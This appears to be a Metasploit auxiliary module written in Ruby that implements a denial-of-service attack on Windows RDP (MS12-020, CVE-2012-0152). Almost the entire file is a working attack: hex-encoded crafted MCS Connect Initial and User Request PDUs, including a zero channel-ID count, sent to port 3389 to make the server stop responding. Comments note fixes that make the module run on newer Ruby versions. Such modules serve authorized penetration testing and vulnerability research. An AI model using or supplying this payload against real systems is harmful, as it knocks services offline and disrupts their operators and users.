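class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Denial-of-service module for MS12-020 (CVE-2012-0152 as referenced
  # below). It connects to the RDP service on RPORT, sends a connection
  # request followed by an MCS Connect Initial PDU (GCC Conference Create
  # Request) with the channel-ID count set to zero, then a User Request
  # PDU, and waits two seconds before disconnecting.
  #
  # This is a Dos mixin module: there is no check method and the intent is
  # to take the target service down. Run it only against hosts you are
  # authorized to disrupt.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ms12-020',
      'Description'    => %q{
        MS12-020 RDP denial of service. Sends an MCS Connect Initial PDU
        (GCC Conference Create Request) whose channel-ID count is zero,
        followed by a User Request PDU, to the target's RDP port. This is
        a destructive test; an affected server is expected to stop
        responding.
      },
      'Author'         => [ 'a.maloteaux' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 14976 $',
      'References'     =>
        [
          [ 'CVE', '2012-0152' ],
          [ 'MSB', 'MS12-020'],
          [ 'OSVDB', '80004' ],
          [ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],
        ],
      'DisclosureDate' => 'Mar 03 2012'))

    register_options(
      [
        Opt::RPORT(3389)
      ], self.class )
  end

  # Build the crafted RDP PDUs, send them in one write, give the server two
  # seconds to process them, then close the socket.
  #
  # Connection failures (refused, unreachable, timed out) and a peer that
  # drops the connection mid-write are reported via print_error; anything
  # else propagates to the framework so it is not silently masked as
  # "Server not available".
  def run
    # clientName: 6..15 random alphanumerics, NUL-padded to 16 characters,
    # encoded as UTF-16LE (32 bytes on the wire).
    client_name = ::Rex::Text::to_unicode(
      ::Rex::Text::rand_text_alphanumeric(15 - rand(10)).ljust(16, "\x00"),
      'utf-16le')

    # clientProductId: digits in a 5-3-7-5 pattern, NUL-padded to 32
    # characters, encoded as UTF-16 (64 bytes on the wire).
    client_product_id = "#{::Rex::Text::rand_text_numeric(5)}-#{::Rex::Text::rand_text_numeric(3)}-#{::Rex::Text::rand_text_numeric(7)}-#{::Rex::Text::rand_text_numeric(5)}"
    client_product_id = ::Rex::Text::to_unicode(client_product_id.ljust(32, "\x00"))

    # TPKT-framed connection request (0x13 = 19 bytes including the header).
    payload = hex_to_bin("030000130EE000000000000100080000000000")

    # MCS Connect Initial PDU with GCC Conference Create Request
    payload << hex_to_bin("030001a002f0807f6582019404010104")
    payload << hex_to_bin("01010101ff3019")
    # ChannelIds = 0 -- the field the original author singled out;
    # presumably the trigger for this DoS (see the referenced advisory).
    payload << hex_to_bin("020100")
    payload << hex_to_bin("020102020100")
    payload << hex_to_bin("0201010201000201010202ffff020102")
    payload << hex_to_bin("30190201010201010201010201010201")
    payload << hex_to_bin("0002010102020420020102301c0202ff")
    payload << hex_to_bin("ff0202fc170202ffff02010102010002")
    payload << hex_to_bin("01010202ffff02010204820133000500")
    payload << hex_to_bin("147c0001812a000800100001c0004475")
    payload << hex_to_bin("6361811c01c0d8000400080000050004")
    payload << hex_to_bin("01ca03aa09040000ce0e0000")
    payload << client_name
    payload << hex_to_bin("04000000")
    payload << hex_to_bin("000000000c0000000000000000000000")
    payload << hex_to_bin("00000000000000000000000000000000")
    payload << hex_to_bin("00000000000000000000000000000000")
    payload << hex_to_bin("00000000000000000000000000000000")
    payload << hex_to_bin("000000000000000001ca010000000000")
    payload << hex_to_bin("180007000100")
    payload << client_product_id
    payload << hex_to_bin("00000000000004c00c00")
    payload << hex_to_bin("0d0000000000000002c00c001b000000")
    payload << hex_to_bin("0000000003c02c000300000072647064")
    payload << hex_to_bin("7200000000008080636c697072647200")
    payload << hex_to_bin("0000a0c0726470736e640000000000c0")

    # User Request PDU
    payload << hex_to_bin("0300000802f08028")

    begin
      connect
      sock.put(payload)
      # No response is expected; just give the server time to act on the
      # PDUs before the socket is torn down.
      Kernel.select(nil, nil, nil, 2)
    rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EPIPE => e
      print_error("Server not available: #{e.message}")
    ensure
      # The original never closed the socket; always release it.
      disconnect
    end
  end

  private

  # Decode a hex string into raw bytes.
  #
  # The original used `"..".to_a.pack("H*")`, which relies on String#to_a.
  # That method only exists on Ruby 1.8; on 1.9+ it raises NoMethodError
  # before anything is sent, so the module could not run at all there.
  # Wrapping the string in an Array literal works on every Ruby version.
  def hex_to_bin(hex)
    [hex].pack("H*")
  end
end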